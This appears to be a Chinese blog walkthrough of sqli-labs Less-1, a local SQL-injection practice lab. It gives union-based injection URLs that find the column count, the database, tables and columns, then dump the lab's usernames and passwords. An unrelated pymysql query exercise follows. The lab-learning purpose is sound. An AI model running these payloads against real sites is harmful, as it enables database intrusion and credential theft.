2021-09-09

sqli-labs 靶场打靶

basic challenges

less-1

http://localhost/sqli-labs-master/Less-1/?id=1
有信息出现,可以进行联合查询注入

根据标题信息,基于get请求的单引号注入,我们可以判断闭合符号为单引号
http://localhost/sqli-labs-master/Less-1/?id=1‘
出现报错信息,报错如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://localhost/sqli-labs-master/Less-1/?id=1' order by 2 --+
因为出现两个字段,猜测查询结果集有两个字段的,从2开始
http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+ 
报错,所以结果集有三个字段。
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2,3 --+
页面无变化,此时把id改为-1显示后面的查询信息(因为union是合并结果集,当id为正确值的时候,他优先显示原本的查询)
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
结果显示2,3被打印出来了,2,3的位置可以用于注入

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() --+
数据库名就显示出来了,数据库名为:security

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
通过group_concat将所有的表名都来连接,得到表名有:emails,referers,uagents,users

users为用户列表,接下来去看改表中的字段
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users '--+
得到字段有:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password 

接下来我们去爆破username喝password
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
0x代表16进制, 3a是58,在ascii中是 ’:‘,用这个来分割用户名和密码。最后的结果:
Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4 

使用python中的pymsql完成如下:表结构与数据创建 1. 建立 `users` 表和 `orders` 表。 `users` 表有用户ID、用户名、年龄字段,(id,name,age) `orders` 表有订单ID、订单日期、订单金额,用户id字段。(id,order_date,amount,user_id) 2 两表的id作为主键,`orders` 表用户id为users的外键 3 插入数据 `users` (1, '张三', 18), (2, '李四', 20), (3, '王五', 22), (4, '赵六', 25), (5, '钱七', 28); `orders` (1, '2021-09-01', 500, 1), (2, '2021-09-02', 1000, 2), (3, '2021-09-03', 600, 3), (4, '2021-09-04', 800, 4), (5, '2021-09-05', 1500, 5), (6, '2021-09-06', 1200, 3), (7, '2021-09-07', 2000, 1), (8, '2021-09-08', 300, 2), (9, '2021-09-09', 700, 5), (10, '2021-09-10', 900, 4); 查询语句 1. 查询订单总金额 2. 查询所有用户的平均年龄,并将结果四舍五入保留两位小数。 3. 查询订单总数最多的用户的姓名和订单总数。 4. 查询所有不重复的年龄。 5. 查询订单日期在2021年9月1日至9月4日之间的订单总金额。 6. 查询年龄不大于25岁的用户的订单数量,并按照降序排序。 7. 查询订单总金额排名前3的用户的姓名和订单总金额。 8. 查询订单总金额最大的用户的姓名和订单总金额。 9. 查询订单总金额最小的用户的姓名和订单总金额。 10. 查询所有名字中含有“李”的用户,按照名字升序排序。 11. 查询所有年龄大于20岁的用户,按照年龄降序排序,并只显示前5条记录。 12. 查询每个用户的订单数量和订单总金额,并按照总金额降序排序。
最新发布
06-03
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值